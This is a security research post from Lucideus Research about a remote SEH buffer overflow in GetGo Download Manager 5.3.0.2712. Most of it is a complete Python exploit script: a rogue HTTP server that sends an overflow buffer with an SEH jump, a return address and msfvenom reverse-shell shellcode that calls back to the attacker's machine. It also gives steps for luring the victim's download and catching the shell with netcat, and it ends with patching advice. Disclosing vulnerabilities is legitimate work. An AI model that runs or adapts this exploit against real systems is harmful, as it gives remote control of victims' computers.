GetGo Download Manager Version 5.3.0.2712 | Remote Buffer Overflow (SEH) | Lucideus Research

Introduction 
GetGo Download Manager is a fully featured free download manager with integrated web video downloader. It can increase download speeds by up to 5 times, resume and schedule downloads. Comprehensive error recovery and resume capability can restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple yet modern graphic user interface makes GetGo user friendly and easy to use.

GetGo Download Manager has a smart download engine that can intelligently segment the file using multiple threads to accelerate your downloads. GetGo Download Manager supports proxy servers, ftp, http and https protocols, firewalls, redirects, cookies and authorization.

Download Vulnerable Version : GetGo Download Manager Version: 5.3.0.2712

Lab Environment

Attacker Machine: Kali linux 2017.3 with NetCat

Tested On: Windows XP SP3

Exploitation

Step 1: Setup listener on port 443, on attacking machine

run script GetGo.py on attacking machine

# python GetGo.py

#!/usr/bin/python

import sys

import socket

import os

import time

 

host = "192.168.2.191"

port = 80

  

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.bind((host, port))

s.listen(1)

print "\n[+] listening on %d ..." % port

 

bz, addr = s.accept()

print "[+] connection accepted from %s" % addr[0]

 

junk = "A"*20

#jump 6

nseh = "\xeb\x06\x90\x90"          

 

#0x72d11f39 : pop edi # pop esi # ret 0x04 |  {PAGE_EXECUTE_READ}

                [msacm32.drv]

seh = "\x39\x1f\xd1\x72"                        

 

    #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.191 LPORT=443 -b "\x00" -f c

#Payload size: 351 bytes

reverse = ("\xd9\xeb\xd9\x74\x24\xf4\x5f\x2b\xc9\xba\xbe\x91\xb4\x8e\xb1"

"\x52\x31\x57\x17\x83\xef\xfc\x03\xe9\x82\x56\x7b\xe9\x4d\x14"

"\x84\x11\x8e\x79\x0c\xf4\xbf\xb9\x6a\x7d\xef\x09\xf8\xd3\x1c"

"\xe1\xac\xc7\x97\x87\x78\xe8\x10\x2d\x5f\xc7\xa1\x1e\xa3\x46"

"\x22\x5d\xf0\xa8\x1b\xae\x05\xa9\x5c\xd3\xe4\xfb\x35\x9f\x5b"

"\xeb\x32\xd5\x67\x80\x09\xfb\xef\x75\xd9\xfa\xde\x28\x51\xa5"

"\xc0\xcb\xb6\xdd\x48\xd3\xdb\xd8\x03\x68\x2f\x96\x95\xb8\x61"

"\x57\x39\x85\x4d\xaa\x43\xc2\x6a\x55\x36\x3a\x89\xe8\x41\xf9"

"\xf3\x36\xc7\x19\x53\xbc\x7f\xc5\x65\x11\x19\x8e\x6a\xde\x6d"

"\xc8\x6e\xe1\xa2\x63\x8a\x6a\x45\xa3\x1a\x28\x62\x67\x46\xea"

"\x0b\x3e\x22\x5d\x33\x20\x8d\x02\x91\x2b\x20\x56\xa8\x76\x2d"

"\x9b\x81\x88\xad\xb3\x92\xfb\x9f\x1c\x09\x93\x93\xd5\x97\x64"

"\xd3\xcf\x60\xfa\x2a\xf0\x90\xd3\xe8\xa4\xc0\x4b\xd8\xc4\x8a"

"\x8b\xe5\x10\x1c\xdb\x49\xcb\xdd\x8b\x29\xbb\xb5\xc1\xa5\xe4"

"\xa6\xea\x6f\x8d\x4d\x11\xf8\x72\x39\x1b\x47\x1a\x38\x1b\xb6"

"\x60\xb5\xfd\xd2\x86\x90\x56\x4b\x3e\xb9\x2c\xea\xbf\x17\x49"

"\x2c\x4b\x94\xae\xe3\xbc\xd1\xbc\x94\x4c\xac\x9e\x33\x52\x1a"

"\xb6\xd8\xc1\xc1\x46\x96\xf9\x5d\x11\xff\xcc\x97\xf7\xed\x77"

"\x0e\xe5\xef\xee\x69\xad\x2b\xd3\x74\x2c\xb9\x6f\x53\x3e\x07"

"\x6f\xdf\x6a\xd7\x26\x89\xc4\x91\x90\x7b\xbe\x4b\x4e\xd2\x56"

"\x0d\xbc\xe5\x20\x12\xe9\x93\xcc\xa3\x44\xe2\xf3\x0c\x01\xe2"

"\x8c\x70\xb1\x0d\x47\x31\xc1\x47\xc5\x10\x4a\x0e\x9c\x20\x17"

"\xb1\x4b\x66\x2e\x32\x79\x17\xd5\x2a\x08\x12\x91\xec\xe1\x6e"

"\x8a\x98\x05\xdc\xab\x88")

 

fill = "D"*(4055 - len(reverse))

 

payload = junk + nseh + seh + reverse + fill

 

buffer = payload + "\r"

buffer+= payload + "\r"

buffer+= payload + "\r\n"

 

print bz.recv(1000)

bz.send(buffer)

print "[+] sending buffer ok\n"

 

time.sleep(3)

bz.close()

s.close()

Step 3: Open app on victim machine and go to download ,select new, add http://attacker ip to URL

index.html to File Name and select OK

Step 4 :  Check Attacker machine, we get remote shell through NetCat

                                                                 POC VIDEO

Conclusion: The GetGo Download Manager should be updated to the Patched version of http://www.getgosoft.com/getgodm/thankyou and Firewall should be properly configured so that no attacker can access to your machine remotely.